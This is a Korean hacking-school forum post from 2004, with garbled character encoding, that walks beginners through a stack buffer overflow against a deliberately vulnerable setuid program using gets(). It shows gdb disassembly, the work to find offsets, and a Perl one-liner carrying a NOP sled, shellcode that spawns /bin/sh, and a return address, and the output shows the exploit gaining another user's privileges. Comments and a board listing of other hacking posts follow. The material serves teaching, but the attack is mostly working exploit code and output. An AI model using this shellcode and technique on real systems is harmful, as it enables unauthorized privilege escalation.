1586, 1/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   BOF ÇØ°á ¹«ÀÛÁ¤ µû¶óÇϱâ #1

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=181 [º¹»ç]

Produced by ganseo
e-mail : postmaster@ganseo.com
homepage : http://www.ganseo.com

¾Æ·¡ ¹®¼­¿¡¼­ ÁÖ¼®Ã³¸®µÈ ºÎºÐÀÌ ¼³¸íÀÔ´Ï´Ù.
Ãʺ¸ÀÚµéÀÌ ½±°Ô µû¶ó ÇÒ ¼ö ÀÖµµ·Ï Çѹø ¸¸µé¾î ºÃ½À´Ï´Ù.
Á¦ ¿ö°ÔÀÓ ¼­¹ö¿¡¼­ Å×½ºÆ® ÇغýÀ´Ï´Ù.
µÎ°¡Áö ¹öÁ¯À¸·Î ÁغñÇØ ºÃ½À´Ï´Ù.
Á÷Á¢ ¹öÆÛ¿¡ ½©Äڵ带 Áý¾î³Ö°í ÇÏ´Â ¹æ¹ý°ú egg ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ´Â ¹æ¹ýÀÔ´Ï´Ù.

gcc ¹öÁ¯ Á¤º¸ÀÔ´Ï´Ù.
[root@localhost .test]# gcc -v      
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)

[root@localhost /]# mkdir .test
[root@localhost /]# cd .test
//test ȯ°æÀ» ¸¸µé¾î º¸°Ú½À´Ï´Ù. ¾²Áö ¸»¾Æ¾ßÇÒ getsÇÔ¼ö¸¦ ½è½À´Ï´Ù.^^
[root@localhost .test]# cat > testApp.c        
#include <stdio.h>
void main(int argc , char** argv)
        char buffer[200];

        printf("type ur words : ");
        printf("words = %s\n" , buffer);
[root@localhost .test]# gcc -o testApp testApp.c
testApp.c: In function `main':
testApp.c:3: warning: return type of `main' is not `int'
/tmp/ccFrX0ch.o: In function `main':
/tmp/ccFrX0ch.o(.text+0x24): the `gets' function is dangerous and should not be used.
[root@localhost .test]# chmod 4750 testApp
[root@localhost .test]# chown recluse8 testApp
[root@localhost .test]# chgrp recluse7 testApp
[root@localhost .test]# ls -al
ÇÕ°è 28
drwxr-xr-x    2 root     root         4096  4¿ù 10 00:08 .
drwxr-xr-x   21 root     root         4096  4¿ù  9 23:17 ..
-rwsr-x---    1 recluse8 recluse7    13842  4¿ù 10 00:08 testApp
-rw-r--r--    1 root     root          155  4¿ù 10 00:08 testApp.c
[root@localhost .test]#

//ÇÁ·Î±×·¥À» ÆÞÀ» °¡Áö°í ½ÇÇèÇغ¸¾Ò½À´Ï´Ù.
[root@localhost .test]# (perl -e 'print "A"x300';cat)|./testApp


¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù
[root@localhost .test]#

//¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù°¡ ³ª´Â°É º¸´Ï bof°¡ ÀϾ´Ï´Ù.

*ù¹ø° ¹æ¹ýÀÔ´Ï´Ù.
*ÀÏ´Ü gdb·Î disassemble Çؼ­ ¿ì¸®°¡ ³ÖÀ» ¹öÆÛÀÇ ÁÖ¼Ò¿Í ret address°¡ µé¾î°¥ ºÎºÐÀ» ¾Ë¾Æº¸µµ·Ï ÇÏ°Ú½À´Ï´Ù.
*ÁÖº¯ Áö½ÄÀº ganseo.comÀÇ ¹®¼­¸¦ ÂüÁ¶Çϼ¼¿ä.
*¾ÕÀ¸·Î ¿ì¸®´Â A·Î ü¿ü´ø ºÎºÐ¿¡ ¿ì¸®ÀÇ ½©Äڵ带 ³ÖÀ»Å×°í mainÇÔ¼öÀÇ ret addressºÎºÐ¿¡  
*¿ì¸®°¡ ³ÖÀº ½©ÄÚµåÀÇ ÁÖ¼Ò¸¦ ³Ö¾îÁÙ ¿¹Á¤ÀÔ´Ï´Ù.^^
[root@localhost .test]# gdb -q testApp
(gdb) disass main
Dump of assembler code for function main:
0x8048490 <main>:       push   %ebp
0x8048491 <main+1>:     mov    %esp,%ebp
0x8048493 <main+3>:     sub    $0xd8,%esp
//buf¸¦ ÄÄÆÄÀÏ·¯°¡ dummy¿Í ÇÔ²² À̸¸Å­ Àâ´Â´Ù. 10Áø¼ö·Î 216
//±×·¯¸é ¾ÕÀ¸·Î ã¾Æº¼ ebp - 0xd8À» ÇÑ°÷¿¡ ÀԷ¹ÞÀº °ªÀÌ µé¾î°¥ °ÍÀÌ¶ó ¿¹»óÇÒ¼ö ÀÖ´Ù.
0x8048499 <main+9>:     sub    $0xc,%esp
0x804849c <main+12>:    push   $0x8048548
0x80484a1 <main+17>:    call   0x804836c <printf>
0x80484a6 <main+22>:    add    $0x10,%esp
0x80484a9 <main+25>:    sub    $0xc,%esp
0x80484ac <main+28>:    lea    0xffffff28(%ebp),%eax
0x80484b2 <main+34>:    push   %eax
0x80484b3 <main+35>:    call   0x804833c <gets>
0x80484b8 <main+40>:    add    $0x10,%esp
0x80484bb <main+43>:    sub    $0x8,%esp
0x80484be <main+46>:    lea    0xffffff28(%ebp),%eax
0x80484c4 <main+52>:    push   %eax
0x80484c5 <main+53>:    push   $0x8048559
0x80484ca <main+58>:    call   0x804836c <printf>
0x80484cf <main+63>:    add    $0x10,%esp
0x80484d2 <main+66>:    leave  
0x80484d3 <main+67>:    ret    
0x80484d4 <main+68>:    nop    
0x80484d5 <main+69>:    nop    
0x80484d6 <main+70>:    nop    
0x80484d7 <main+71>:    nop    
0x80484d8 <main+72>:    nop    
0x80484d9 <main+73>:    nop    
0x80484da <main+74>:    nop    
0x80484db <main+75>:    nop    
0x80484dc <main+76>:    nop    
0x80484dd <main+77>:    nop    
0x80484de <main+78>:    nop    
0x80484df <main+79>:    nop    
End of assembler dump.

//ebp¸¦ ã¾Æ¼­ ret address°¡ ¾îµðÀÖ´ÂÁö ÃßÃøÇغ¸ÀÚ.
(gdb) b *(main+3)
0x08048493 in main ()
(gdb) info reg
eax            0x40158ac0       1075153600
ecx            0x0      0
edx            0x0      0
ebx            0x40159fd0       1075158992
esp            0xbffffab8       0xbffffab8        
ebp            0xbffffab8       0xbffffab8                //¿©±â°¡ ebp´Ù. ±×·¸´Ù¸é ebp + 4 ºÎºÐ¿¡ ¿ì¸®°¡ ¸¸µé ½©ÄÚµåÀÇ address¸¦ ³Ö¾îÁÖ¸é µÇ°Ú´Ù.
esi            0x40015e4c       1073831500
edi            0xbffffb24       -1073743068
eip            0x8048493        0x8048493
eflags         0x396    918
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x23     35
fioff          0x400458fe       1074026750
foseg          0x2b     43
fooff          0x808fc74        134806644
fop            0x2e9    745
xmm0           0x00000000000000000000000000000000
xmm1           0x00000000000000000000000000000000
xmm2           0x00000000000000000000000000000000
xmm3           0x00000000000000000000000000000000
xmm4           0x00000000000000000000000000000000
xmm5           0x00000000000000000000000000000000
xmm6           0x00000000000000000000000000000000
xmm7           0x00000000000000000000000000000000
mxcsr          0x1f80   8064

(gdb) b *(main+58)
Breakpoint 1 at 0x80484ca
(gdb) r
Starting program: /.test/testApp
type ur words : AAAAAAAAAAAAAAA

Breakpoint 1, 0x080484ca in main ()

(gdb) x/100bx 0xbffff9e0
(gdb) x/100bx 0xbffff9d0
0xbffff9d0:     0x59    0x85    0x04    0x08    0xe0    0xf9    0xff    0xbf
0xbffff9d8:     0x74    0x61    0xdf    0x03    0xa0    0xfa    0xff    0xbf
0xbffff9e0:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41        //ÃßÃøÇÑ´ë·Î ebp - 0xd8ºÎºÐ¿¡ A(0x41)ÀÌ µé¾î°¡ÀÖ´Ù.
0xbffff9e8:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x00
0xbffff9f0:     0xfc    0x1b    0x03    0x40    0xe0    0x63    0x01    0x40
0xbffff9f8:     0x01    0x00    0x00    0x00    0xa0    0x81    0x04    0x08
0xbffffa00:     0x94    0x60    0x01    0x40    0x8e    0xff    0x77    0x01
0xbffffa08:     0x8e    0xff    0x77    0x01    0xd0    0xfa    0xff    0xbf
0xbffffa10:     0xf8    0x5e    0x01    0x40    0x4c    0x82    0x04    0x08
0xbffffa18:     0x10    0x69    0x69    0x0d    0x5c    0xfa    0xff    0xbf
0xbffffa20:     0xec    0x46    0x03    0x40    0xe0    0x63    0x01    0x40
0xbffffa28:     0xc0    0x66    0x01    0x40    0x01    0x00    0x00    0x00
0xbffffa30:     0x00    0x00    0x00    0x00

//ÀÌÁ¦ ¿ì¸®°¡ ³ÖÀ» ½©ÄÚµåÀÇ ÁÖ¼Òµµ ¾Ë¾Æ³Â°í ½©ÄÚµå ÁÖ¼Ò°¡ µé¾î°¡¾ßÇÒ ºÎºÐÀÇ ÁÖ¼Òµµ ¾Ë¾Æ³ÂÀ¸´Ï
//°£´ÜÇÑ ÆÞ½ºÅ©¸³Æ®¸¦ ¸¸µé¾îº¸ÀÚ. ½©ÄÚµå´Â ¹®¼­¸¦ ÂüÁ¶ÇϽñæ...
[root@localhost .test]# id recluse8
uid=1008(recluse8) gid=1008(recluse8) groups=1008(recluse8)

//½©ÄÚµå byte 63
//mainÀÇ return address ±îÁöÀÇ byte  216 + 4 = 220
[root@localhost .test]# su recluse7
[recluse7@localhost .test]$ (perl -e 'print "\x90"x156';perl -e 'print "\x31\xc9\x66\xb9\xf0\x03\x31\xdb\x66\xbb\xf0\x03\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x00"';perl -e 'print "\xe0\xf9\xff\xbf"';cat)|./testApp

type ur words : words = 1?¹ð1?»ð1À°FÍë^1ÀFF  V
uid=1008(recluse8) gid=1007(recluse7) groups=1007(recluse7)


  Hit : 14926     Date : 2004/04/12 02:01

singalnnn ¹º ¼Ò¸°Áö ¸ð¸£°Î½À´Ï´Ù¿ä... 2004/04/13  
Totory ¸Ó¶ó´Â°Å¾ß -_- 2004/04/14  
dz¸²È­»ê À̰ɺ¸°í ¸ð¸¥´Ù¸é BOF°øºÎ ±âÃʺÎÅÍ Çϼ¼¿ä ½Ç±â¸¦ »ó¼¼È÷ ¼³¸íÇÑ°ÍÀε¥..¿Ö.. 2004/04/16
dlxorud90 ±âÃÊ ¾îµð¼­´Â¾îµð¼­ Çϴ°ÍÀÌÁÒ? 2004/04/20  
ssuckies www.ganseo.com ÀÔ´Ï´Ù.^^ 2004/04/22  
UNIXSVR4 ¤»¤»¤» shellcode´Â ±ÍÂúÀº°Å¿©... 2007/07/16  
UNIXSVR4 Á¤¸»´ë´ÜÇϽʴϴÙ.ÀÌ·¸°Ô ½±°Ô bof¸¦ ¼³¸íÇϽôٴÏ... Á¤¸» ¾î·Æ°Ô °øºÎÇߴµ¥.. 2007/07/16  
     [°øÁö] °­Á¸¦ ¿Ã¸®½Ç ¶§´Â ¸»¸Ó¸®¸¦ ´Þ¾ÆÁÖ¼¼¿ä^¤Ñ^ [29] ¸Û¸Û 02/27 19055
1585   ÆÄÀ̽ã random¸ðµâÀ» ÀÌ¿ëÇÑ ¼ýÀÚ¸ÂÃ߱⠰ÔÀÓ ±¸Çö     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/30 383
1584   ÆÄÀ̽ã äÆà ÇÁ·Î±×·¥ ±¸Çö     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/28 287
1583   ÆÄÀ̽㠼ÒÄÏ ÇÁ·Î±×·¡¹ÖÀÇ ±âÃÊ     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/26 282
1582   ¸®´ª½º À¥ ·Î±× ºÐ¼®     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/20 251
1581   ¸®´ª½º/À©µµ¿ì º¸¾È Àåºñ ·Î±×     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/20 283
1580   °í¼ö´ÔµéÀÇ µµ¿òÀ» ¹Þ°í ½Í½À´Ï´Ù     vbnm111
02/11 513
1579   ¸®´ª½º Ä¿³Î 2.6 ¹öÀü ÀÌÈÄÀÇ LKM     jdo
07/25 1029
1578   ½©ÄÚµå ¸ðÀ½     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/15 1857
1577   Call by value VS Call by Reference     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/15 1206
1576   (²Ä¼ö) L.O.B Çѹ濡 Ŭ¸®¾îÇϱâ[2]     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/14 1601
1575   towelroot.c (zip) ÄÚ¸àÆÃ.[1]     scube
08/18 4112
1574   levitator.c (¾Èµå·ÎÀÌµå ·çÆÃ) °ø°Ý ºÐ¼® ¼Ò½º ÄÚµå °øÀ¯.[4]     scube
08/17 3991
1573   ¹«·á Á¤º¸º¸¾È ±â¼úÀÎÀç ¾ç¼º °úÁ¤ ±³À°»ý ¸ðÁý     chanjung111
06/17 4834
1572   K-Shield ÁִϾî 5±â ¸ðÁý     lrtk
06/17 4538
1571   [ÆÁ] ÆÄÀ̽ã 2¼Ò½º¸¦ 3À¸·Î º¯°æÇØÁÖ´Â »çÀÌÆ®[3]     ÇѽÂÀç
05/13 4240
1570   ±¸±Û ¹é¸µÅ© ÀÛ¾÷ Áú¹®¿ä     wkatnxka
03/30 3661
1569   [ÆÁ] ¿ìºÐÅõ ¹Ì·¯¸µ¼­¹ö     ÇѽÂÀç
03/09 4365
1568 ºñ¹Ð±ÛÀÔ´Ï´Ù  °¨À»¸øÀâ°Ú³×¿ä¤Ì¤Ì     À×À×À×
01/15 3
1567   µ¥ºñ¾È °è¿­ ¸®´ª½º ÀÇÁ¸¼º ±úÁ³À»¶§ ÇØ°á¹ý     ÇѽÂÀç
11/27 4858
1 [2][3][4][5][6][7][8][9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org